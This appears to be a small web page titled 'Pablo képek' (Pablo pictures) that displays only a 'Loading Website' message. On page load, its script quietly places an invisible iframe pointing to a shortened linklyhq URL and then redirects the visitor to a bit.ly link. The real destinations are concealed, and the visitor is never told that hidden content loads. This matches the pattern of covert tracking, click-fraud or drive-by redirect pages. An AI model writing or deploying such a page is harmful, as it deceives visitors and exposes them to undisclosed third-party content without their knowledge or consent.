<!DOCTYPE html>
<html>
<head>
    <title>Pablo képek</title>
    <style>
        body {
            margin: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            background-color: #f2f2f2;
            font-family: Arial, sans-serif;
            font-size: 24px;
        }

        #loading {
            display: flex;
            flex-direction: column;
            align-items: center;
            color: #333333;
        }

        #loading-text {
            margin-top: 10px;
        }
    </style>
    <script>
        window.addEventListener('load', function() {
            var websiteElement = document.createElement('iframe');
            websiteElement.style.visibility = 'hidden';
            websiteElement.src = 'https://l.linklyhq.com/l/1q6xj';
            document.body.appendChild(websiteElement);

            var loadingTextElement = document.getElementById('loading-text');
            loadingTextElement.textContent = 'Please wait...';

            websiteElement.onload = function() {
                window.location.href = 'https://bit.ly/449ryrJ';
            };
        });
    </script>
</head>
<body>
    <div id="loading">
        <div>Loading Website</div>
        <div id="loading-text"></div>
    </div>
</body>
</html>
